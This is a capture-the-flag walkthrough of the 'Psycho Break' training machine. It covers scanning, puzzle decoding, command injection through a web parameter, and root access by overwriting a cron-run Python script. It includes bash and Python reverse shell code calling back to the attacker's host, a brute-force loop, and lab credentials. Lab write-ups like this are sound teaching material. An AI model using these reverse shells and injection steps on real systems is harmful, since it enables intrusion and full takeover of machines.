Psycho Break Walkthrough

Psycho Break Machine is fairly easy but with few twists.

Let’s Start By Scanning the psycho break machine with Nmap

nmap -sC -sV Machine_IP

We can see that we have

Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-11 05:08 EDT
Nmap scan report for 10.10.154.17
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA)
|   256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA)
|_  256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.35 seconds

• SSH service running on port 22, as OpenSSH 7.2p2.

But, when we try to put as 1 port is open, we get the wrong answer, which means we have other ports up and running, so let’s do a Nmap scan on all ports on Psycho Break machine.

nmap -sC -sV Machine_IP -p-

and you should get the following results.

Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-14 03:25 EDT
Nmap scan report for 10.10.165.93
Host is up (0.28s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5a
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA)
|   256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA)
|_  256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Becon Mental Hospital
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1332.47 seconds

• we have FTP Service but anonymous login is not enabled

So, let’s open the machine in our browser, you should get the following page

Nothing much, so let’s open the Page source to see if there is any important information

So we have a comment talking about a room /sadistRoom, also you can see that there is an a tag that refer to map.html, but it gives 404 when you try to access it.

Let’s open /sadistRoom , you should get the following site

Well, we have the first key, if you click on “here”, you should get a popup with the first flag

532219a04ab7a02b56faafbec1a4c1ea

But after you close the popup, the screen will change to

and in a few seconds, you will get the following page

which means, there is a JavaScript code running that is changing the page, so let’s open the page source so see what is happening in the back.

You will see a script.js file, when opened you will get the following script.

$(".keypressed").click(function(e) {
	e.preventDefault();
	alert("Key to locker Room => 532219a04ab7a02b56faafbec1a4c1ea")
	setTimeout(function() {
		herecomesSadist();
}, 1500);
});

function herecomesSadist(){
	$("body").css("background-color","#000");
	$(".para").text("Escape to locker Room before its too late !!!");
	$(".para").addClass("danger")
	$(".center-wrapper").css("display","none");
	$(".imgsource").attr('src', 'EscapingSadist.jpg');
	$(".imgsource").css('height', '300px');
	$(".imgsource").css('width', '500px');
	$(".center-wrapper").css("display","flex");
	$(".btn-danger").css("display","flex")
	$(".btn-danger").css("background-color","#f50000")
	$(".btn-danger").css("color","#000")

	setTimeout(function() {
		$("body").css("background-color","#f50000");
		$(".imgsource").attr('src', 'SadistShred.gif');
		$(".center-wrapper").css("display","flex");
		$(".para").text("Too Late Sebastian is dead !!!");
		$(".para").css('color', '#000');
		$(".para").css('text-align', 'center');
		$(".para").css('font-size', '25px');
		$(".btn-danger").css("display","none");

	}, 6000);
}

$(".btn-danger").click(function(e) {
	const key = prompt("Enter Key To The Locker Room ");
	if (key == "532219a04ab7a02b56faafbec1a4c1ea"){
		window.open("../lockerRoom/","_self")
	}
});

We can see our flag in the script, along with the changes that happens in the page in “herecomesSadist” function , but in the end, we can see a new page “lockerRoom”, so let’s open that page.

aaand we get a new page

so we have a text that needs to be decoded

Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv

along with a link to go to a map, which is a page with input field.

So, let’s start by decoding the message, first let’s try the ROT method with different values to rotate.

you can try this site to see all the possible values for the ROT but none of them makes sense, so let’s try a different decoding algorithm.

after some research, the text is encoded with Atbash method, after we decode it, we will get the following text which is our 2nd flag.

Grant_me_access_to_the_map_please

after we enter the key in map.php page, we will get the following pages

• /sadistRoom/ (we already know it)
• /lockerRoom/(we already know it)
• /SafeHeaven/
• /abandonedRoom/

let’s start with Safe heaven Room.

there’s nothing much from the first sight, so let’s go and access the page source.

we will find a hint as html comment

<!-- I think I'm having a terrible nightmare. Search through me and find it ... -->

This hint mainly says that there’s something hiding, so it could be one of these options

• page’s codes (CSS or JavaScript)
• hidden page under the SafeHeaven Directory
• images above as a steganography

You can check the codes for the CSS and javascript files but nothing is useful there, normal CSS along with JQuery and Lightbox (used to display images)

let’s go for the second option and scan the hidden directories with GoBuster Tool, let’s keep it running for around 10-15 mins,

gobuster dir --url http://Machine_IP/SafeHeaven -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

you should get the following directories

/imgs (Status: 301)
/keeper (Status: 301)

The first one has the images that we have in the page, so we will neglect it.

let’s access the second link, you would get this page

and if you click on Escape Keeper, it should take you to a page asking to identify a specific location from an image.

http://Machine_IP/SafeHeaven/keeper/escapefromkeeper.php

We need to find the following location, a simple google reverse image search would get us the answer

St. Augustine Lighthouse

and we will get our next flag

48ee41458eb0b43bf82b986cecf3af01

let’s take the flag and put it in the /abandonedRoom page , you would be redirected to the following page

http://Machine_IP/abandonedRoom/be8bc662d1e36575a52da40beba38275/index.php

if you click on Go Further, you would be redirected to the following page.

http://10.10.57.176/abandonedRoom/be8bc662d1e36575a52da40beba38275/herecomeslara.php

there’s nothing much in this page, so let’s access the source code. We would get a new hint

<!-- There is something called "shell" on current page maybe that'll help you to get out of here !!!-->

So this means that there should be a way to access the shell on the server, now the shell is written between “”, which is usually a hint for a parameter on the page.

this parameter can be sent by different HTTP Methods, but let’s try with a GET request, we can send a GET request parameter by appending the URL with “?shell=” and let’s use a normal command, for example, listing the files.

http://Machine_IP/abandonedRoom/be8bc662d1e36575a52da40beba38275/herecomeslara.php?shell=ls

and, you can see that we got the results of the directories back

now, since we have access to the shell, this means we can use commands, and what a better command that opening a reverse shell to our machine where we can have more freedom.

We will use the same script we used in the previous Article.

bash -i >& /dev/tcp/your_IP/your_port 0>&1

but apparently, the command is not allowed. so let’s try to explore a little bit, if we try to go back one level to see the previous directory, you can use

cd ..

but apparently the cd command is not allowed in the beginning , but we know that ls worked with us, so why don’t we just ls the previous directory, where you can use

ls ..

and voila! you should get the following files

• 680e89809965ec41e64dc7e447f175ab
• be8bc662d1e36575a52da40beba38275
• index.php

now, obviously two of them are hashes or hexadecimal encoded, but most probably it’s a hash, so let’s search online to see what do they mean.

before getting the meaning of the hashes, since these are on a web server, that means it’s a page and of course, the second hash is the current page directory.

if you remember our page is

http://Machine_IP/abandonedRoom/be8bc662d1e36575a52da40beba38275/herecomeslara.php

so let’s access the first hash page.

http://Machine_IP/abandonedRoom/680e89809965ec41e64dc7e447f175ab

we will get the following files, let’s download them first.

and the next flag will be the text file that we got, which is

you_made_it

and now, let’s go to the zip file , first, let’s extract the files inside.

we will get a text file and an image, the text file will have the following hint.

Who ever sees this message "HELP Me". Ruvik locked me up in this cell. Get the key on the table and unlock this cell. I'll tell you what happened when I am out of 
this cell.

now, if we try to open the image, it seems corrupted because the file starts with 0x50 0x4b (this shows in kali image viewer), so let’s copy the file and change the header to make it an openable image.

you can change the header by using any hexa editor you like, But first, let’s get what is the value of a jpg file header.

you can try any of the jpg headers in this link But none of them will work, which means that this file might not be an image.

but what file could it be, and this is what “file” command is used for or simple you can search in the above link for which extensions start with “50 4b” and you will get the following list:

• zip
• aar
• apk
• docx
• epub
• ipa
• jar
• kmz
• maff
• odp
• ods
• odt
• pk3
• pk4
• pptx
• usdz
• vsdx
• xlsx
• xpi

Now, you can change the extension of the file to one of the above and try one by one until one of them works, or you can use the following command.

file Table.jpg 

The command will tell us that this is a Zip file, so let’s change the extension to “zip”

if you open the zip file, you would get an image with the name “Joseph_Oda” and a sound file “key.wav”

now, if you open the image, there’s really nothing in it, so let’s check the exif data of the image

exiftool  Joseph_Oda.jpg 

mmm, nothing in the exif data neither, maybe there’s a file hidden using steganography technique, so let’s use steghide to discover but before that, we need a password, so let’s check the key file.

now the audio file gives beeps sound only, which is similar to Morse code, so let’s search online for a “Morse code audio decoder”, and you should get this website as the first result

Let’s upload the file, and click on play, it should try to decode the audio and gives you the following message.

SHOWME

let’s try to input this message as the password for steghide

steghide extract -sf Joseph_Oda.jpg

and you should get the success message

wrote extracted data to "thankyou.txt".

now let’s open the file, you should get the following text

the file gives us names along with FTP credentials, so we have multiple solutions solved.

Who is locked up in the cell?

jospeh

The .wav file

SHOWME

FTP Username

joseph

FTP User Password

intotheterror445

so now, let’s access the FTP on the machine.

we will get the following files, so let’s download them.

-rwxr-xr-x   1 joseph   joseph   11641688 Aug 13  2020 program
-rw-r--r--   1 joseph   joseph        974 Aug 13  2020 random.dic

one of them is a program and the other is a wordlist, let’s try to run the program.

[+] Usage
./program <word>

so the program takes a word, checks if it is correct then returns the flag maybe.

instead of doing brute force the whole words in the beginning, let’s use “strings” command, maybe we can get the flag, password or even a hash.

strings program

and you will get a lot results, so let’s try to search inside the results using the “grep” command.

strings program 

I tried to search for the following, but nothing came, so let’s do the brute forcing.

• key
• flag
• correct
• valid
• pass

let’s write a bash script where we feed the program all the words in the wordlist.

so first, i wrote the following program

#!/bin/bash
input="newfile.txt"
while read line
do
        ./program $line
done < "$input"

simple , right ? but it never worked, but when i use echo , i can see the line clearly, so why doesn’t it take?

I’ve spent sometime researching the problem, and trying different solutions such as implementing xargs for example, but none of them worked.

so i tried to output all the character using cat

cat -A random.dic 

and i got the following

test^M$
testing^M$
trustno1^M$
tweety^M$
welcome^M$
westside^M$
whatever^M$
windows^M$
writer^M$
zxcvbnm^M$
zxczxc^M$
james^M$

as you can see there are extra characters, so i researched these characters as they’re named  blue carriage return.

the url mentions many ways to remove them, one of them is using dos2unix, where you can run

dos2unix random.dic 

then run the same script from before, and it will work like a charm :D.

while the program is running, you will get the following

kidman => Correct
Well Done !!!
Decode This => 55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 666 7777 8 777 2 66 4 33

so we got the key.

now, it’s time to decode the message.

The first thing i though about, is to convert the numbers to hexadecimal values, so we got the following values

37 1bc 3 6 2 42 1e61 7 2 1e61 1e61 9 29a 309 3 1bc 1e61 1e61 29a 1e61 8 309 2 42 4 21

then I tried to convert the values to string, but I got garbage, so the next step is to check for hashing, so I tried a hashing analyzer tool after I removed the white space.

I got that it is an oracle 11 hashing, but when i searched for it or tried to decrypt it but no success, so I searched for a different type of encoding that uses numbers only.

I tried to search for it on google, and I got this as the first result

so I tried it, to see if it is using the T9 encoding method, which is used mainly in the phones that had physical keyboard.

you can use this image for reference

so the decoding for the string will be the following

KIDMANSPASSWORDISSOSTRANGE

so we got a new user along with its password, so let’s try to login to SSH with the username Kidman and the string we got ( the password has to be in caps ).

great, we logged in, so let’s list the files and directories after login.

drwxr-xr-x 4 kidman kidman 4096 Aug 13  2020 .
drwxr-xr-x 5 root   root   4096 Jul 13  2020 ..
-rw------- 1 kidman kidman    1 Aug 13  2020 .bash_history
-rw-r--r-- 1 kidman kidman  220 Jul 13  2020 .bash_logout
-rw-r--r-- 1 kidman kidman 3771 Aug 13  2020 .bashrc
drwx------ 2 kidman kidman 4096 Jul 13  2020 .cache
drwxrwxr-x 2 kidman kidman 4096 Jul 13  2020 .nano
-rw-r--r-- 1 kidman kidman  655 Jul 13  2020 .profile
-rw-rw-r-- 1 kidman kidman  264 Aug 13  2020 .readThis.txt
-rw-r--r-- 1 root   root     25 May 14 16:22 .the_eye.txt
-rw-rw-r-- 1 kidman kidman   33 Jul 13  2020 user.txt

so many files, so let’s start with user.txt but outputting the file with cat, we will get the following string.

4C72A4EF8E6FED69C72B4D58431C4254

now, the next question is to get the root access, so we’re looking for privilege escalation, but first, let’s output the other text files

so the .readThis.txt will give us the following

uC@> z:5>2?i

%96 E9:?8 x 2> 23@FE E@ E6== D@ :D E@A D64C6E] }@ @?6 5@6D?VE <?@H 23@FE E9:D] xEVD E96 #FG:<VD 6J6] }@ @?6 42? 9:56 2H2J 7C@> :E] qFE x 42? E6== J@F @?6 E9:?8 D62C49 7@C E96 DEC:?8 YE9606J60@70CFG:<Y ] *@F 8@E E@ 96=A $632DE:2? 56762E #FG:< ]]]

and .the_eye.txt will give us the following

No one can hide from me.

I tried to search for decoding for the first file in this website, but I got nothing

so let’s search for programs that our user runs as sudo by using

sudo -l

but we got nothing, then let’s check for the cronjobs to see what’s being executed.

cat /etc/crontab 

and we get the following results

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

*/2 * * * * root python3 /var/.the_eye_of_ruvik.py

one of the files is /var/.the_eye_of_ruvik.py, let’s go there and check the file and we have the write permission for the file

-rwxr-xrw-  1 root root    300 Aug 14  2020 .the_eye_of_ruvik.py

so it’s time to make a reverse shell with python , we can get the code from gtfobins

import sys,socket,os,pty;
s=socket.socket()
s.connect(("machine_ip",port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")

after you do the edits, let’s open a nc in our machine with the same port number, and wait for the machine to connect back to us, the script should run every two minutes, so it might take sometime.

and then you can get the root.txt

BA33BDF5B8A3BFC431322F7D13F3361E

In regard for the bonus task, we need to delete ruvik username.

userdel -r ruvik

to confirm, you can output the /etc/passwd file where ruvik won’t be found

And This is Psycho Break